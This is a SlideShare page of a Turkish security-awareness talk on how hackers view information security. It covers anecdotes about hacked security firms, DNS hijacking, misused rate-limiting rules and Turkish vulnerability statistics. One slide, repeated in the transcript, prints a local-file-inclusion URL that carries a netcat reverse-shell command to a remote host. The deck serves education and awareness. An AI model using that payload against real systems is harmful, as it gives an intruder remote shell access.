SlideShare a Scribd company logo

Hackerların Gözünden Bilgi Güvenliği

BGA Cyber Security
BGA Cyber Security

Related slideshows

DDOS ile Saldırı Gizleme "Smoke Screening"
DDOS ile Saldırı Gizleme "Smoke Screening"DDOS ile Saldırı Gizleme "Smoke Screening"
DDOS ile Saldırı Gizleme "Smoke Screening"
 
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İncelemeBilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
 
DNS Tabanlı Tehdit Görünürlüğü
DNS Tabanlı Tehdit GörünürlüğüDNS Tabanlı Tehdit Görünürlüğü
DNS Tabanlı Tehdit Görünürlüğü
 
1 of 25
Download to read offline
Hackerların Gözünden Bilgi Güvenliği Huzeyfe ÖNAL huzeyfe@lifeoverip.net http://www.lifeoverip.net
Ben kimim? • Bilgi güvenliği Uzmanı & Denetci • Siber güvenlik danışmanı(VS) • Güvenlik eğitmeni – www.guvenlikegitimleri.com • Blogger – www.lifeoverip.net
Ajanda • Bilgi güvenliğine bakış farklılığı • Hacker ya da güvenlik uzmanı • Örneklerle hackerların güvenliğe bakışı
Siber Dünyada Güvenlik • Sosyal yaşam vs Siber Yaşam • Obama’nın dilinden siber güvenlik • It’s been estimated that last year alone cyber criminals stole intellectual property from businesses worldwide worth up to $1 trillion. • In short, America’s economic prosperity in the 21st century will depend on cyber security. 4
Bakış Açısı
Hacker / güvenlik uzmanı • Güvenlik uzmanları prosedürel hareket ettiği için hackerlara göre bir adım geriden gelir. • Güvenlik uzmanları için koruma bir meslek, hackerlar için bu korumaları aşmak bir zevktir. • Hacker için bilgi güvenliği diye bir kavram yoktur, , sadece aşılması gereken engel vardır vardır! • Hackerların mesaisi, sayısı ve motivasyonu farklıdır... – Siber dünyada gece gündüz kavramları yoktur – 7/24 mesai yaparlar! • Örnek: Wordpress açıklığı
Güvenliğimiz nerelere/kimlere bağlıdır?
Örneklerle Hacker bakış açısı
Güvenlikciler nasıl hacklenir? • “Terzi kendi söküğünü dikemez misali” çok konuşur, nasihat verir, korkutur ama kendileri uymaz(genelleme) • Kevin Mitnick, Dan Kaminsky, Symantec, Kaspersky
Kevin Mitnick nasıl hacklendi? Hosting firmaları ne kadar güvenlidir?
Güvenlikciler nasıl hacklenir – II ? Turkticaret.net üzerinden DNS yönlendirme ile 6 saatlik ulaşım sorunu…
Twitter nasıl hacklendi? Domain ismini alan mail adresi ve dns
Patronun mailleri nasıl okunur?
Resim üzerinden sistemi ele geçirme +Local File Inclusion http://hackme.com/wp-contents/photos/huzi.jpg?x=nc -e /bin/sh uzak_sistem.com 80
STS mi SYS mi? • Saldırı Tespit sistemleri nasıl hacklenir? – Güvenlik uzmanına STS kur denir... – Uzman STS cihazını alır kurar ve internete açar • Bir müddet sonra STS cihazı dönüşüm geçirir ve saldırı yapmaya başlar. • STS neden dönüşüm geçirmiştir? – Hediye ☺ • • STS= Saldırı Tespit Sistemi SYS=Saldırı Yapma Sistemi
Ateş etmeyi bilmezseniz ayağınızı vurabilirsiniz! • Güvenlik uzmanına iş verilir: Firewall’dan DDOS koruma için rate limitingi aktif et! – Güvenlik uzmanı hemen şu kuralı yazar: aynı ipden 200’den fazla istek gelirse kara listeye al! • Hacker kaynak ip adresi olarak dns sunucuyu verir (ya da router’in ip adresini) – Firma kendi engelleme sistemiyle kendini engellemiş olur!
SSL Güvenli midir?
Yalnız değilsiniz, günde en az bin ziyaretciniz var! ADSL Abonesi, haftalık aldığı saldırı sayısı 20.000(600 farklı saldırı tipi)
Yamasız Windows kullanımı = Zombi Türkiye’de ortalama 100.000 zombi makine bulunmakta! • Yamasız bir Windows’un internete açıldıktan sonra ele geçirilme süresi ortalama 6.45 dakika...
SMS ile kaos oluşturma!
300$’a siber saldırı ordusu kurulur!
Türkiye güvenliğe ne kadar önem veriyor? • • • • Güvenlik firmaları %80 oranında açık Hosting/ISP’ler %60 oranında Üniversiteler %85 oranında Devlet/kamu sistemleri %55
Ankasec/IstSec.org saldırıları... • 3940 farklı ip adresinden toplam 150.260 atak gerçekleştirilmiş
Kaynaklar • Haftalık güvenlik bülteni: – www.lifeoverip.net/newsletter • Ağ ve bilgi güvenliği listesi – www.lifeoverip.net/netsec-listesi • • • • • www.guvenlikegitimleri.com www.bilgiguvenligi.gov.tr www.Beyazsapka.org www.Lifeoverip.net www.webguvenligi.org
Teşekkürler... www.lifeoverip.net

More Related Content

Hackerların Gözünden Bilgi Güvenliği

  • 1. Hackerların Gözünden Bilgi Güvenliği Huzeyfe ÖNAL huzeyfe@lifeoverip.net http://www.lifeoverip.net
  • 2. Ben kimim? • Bilgi güvenliği Uzmanı & Denetci • Siber güvenlik danışmanı(VS) • Güvenlik eğitmeni – www.guvenlikegitimleri.com • Blogger – www.lifeoverip.net
  • 3. Ajanda • Bilgi güvenliğine bakış farklılığı • Hacker ya da güvenlik uzmanı • Örneklerle hackerların güvenliğe bakışı
  • 4. Siber Dünyada Güvenlik • Sosyal yaşam vs Siber Yaşam • Obama’nın dilinden siber güvenlik • It’s been estimated that last year alone cyber criminals stole intellectual property from businesses worldwide worth up to $1 trillion. • In short, America’s economic prosperity in the 21st century will depend on cyber security. 4
  • 6. Hacker / güvenlik uzmanı • Güvenlik uzmanları prosedürel hareket ettiği için hackerlara göre bir adım geriden gelir. • Güvenlik uzmanları için koruma bir meslek, hackerlar için bu korumaları aşmak bir zevktir. • Hacker için bilgi güvenliği diye bir kavram yoktur, , sadece aşılması gereken engel vardır vardır! • Hackerların mesaisi, sayısı ve motivasyonu farklıdır... – Siber dünyada gece gündüz kavramları yoktur – 7/24 mesai yaparlar! • Örnek: Wordpress açıklığı
  • 9. Güvenlikciler nasıl hacklenir? • “Terzi kendi söküğünü dikemez misali” çok konuşur, nasihat verir, korkutur ama kendileri uymaz(genelleme) • Kevin Mitnick, Dan Kaminsky, Symantec, Kaspersky
  • 10. Kevin Mitnick nasıl hacklendi? Hosting firmaları ne kadar güvenlidir?
  • 11. Güvenlikciler nasıl hacklenir – II ? Turkticaret.net üzerinden DNS yönlendirme ile 6 saatlik ulaşım sorunu…
  • 12. Twitter nasıl hacklendi? Domain ismini alan mail adresi ve dns
  • 14. Resim üzerinden sistemi ele geçirme +Local File Inclusion http://hackme.com/wp-contents/photos/huzi.jpg?x=nc -e /bin/sh uzak_sistem.com 80
  • 15. STS mi SYS mi? • Saldırı Tespit sistemleri nasıl hacklenir? – Güvenlik uzmanına STS kur denir... – Uzman STS cihazını alır kurar ve internete açar • Bir müddet sonra STS cihazı dönüşüm geçirir ve saldırı yapmaya başlar. • STS neden d��nüşüm geçirmiştir? – Hediye ☺ • • STS= Saldırı Tespit Sistemi SYS=Saldırı Yapma Sistemi
  • 16. Ateş etmeyi bilmezseniz ayağınızı vurabilirsiniz! • Güvenlik uzmanına iş verilir: Firewall’dan DDOS koruma için rate limitingi aktif et! – Güvenlik uzmanı hemen şu kuralı yazar: aynı ipden 200’den fazla istek gelirse kara listeye al! • Hacker kaynak ip adresi olarak dns sunucuyu verir (ya da router’in ip adresini) – Firma kendi engelleme sistemiyle kendini engellemiş olur!
  • 18. Yalnız değilsiniz, günde en az bin ziyaretciniz var! ADSL Abonesi, haftalık aldığı saldırı sayısı 20.000(600 farklı saldırı tipi)
  • 19. Yamasız Windows kullanımı = Zombi Türkiye’de ortalama 100.000 zombi makine bulunmakta! • Yamasız bir Windows’un internete açıldıktan sonra ele geçirilme süresi ortalama 6.45 dakika...
  • 20. SMS ile kaos oluşturma!
  • 21. 300$’a siber saldırı ordusu kurulur!
  • 22. Türkiye güvenliğe ne kadar önem veriyor? • • • • Güvenlik firmaları %80 oranında açık Hosting/ISP’ler %60 oranında Üniversiteler %85 oranında Devlet/kamu sistemleri %55
  • 23. Ankasec/IstSec.org saldırıları... • 3940 farklı ip adresinden toplam 150.260 atak gerçekleştirilmiş
  • 24. Kaynaklar • Haftalık güvenlik bülteni: – www.lifeoverip.net/newsletter • Ağ ve bilgi güvenliği listesi – www.lifeoverip.net/netsec-listesi • • • • • www.guvenlikegitimleri.com www.bilgiguvenligi.gov.tr www.Beyazsapka.org www.Lifeoverip.net www.webguvenligi.org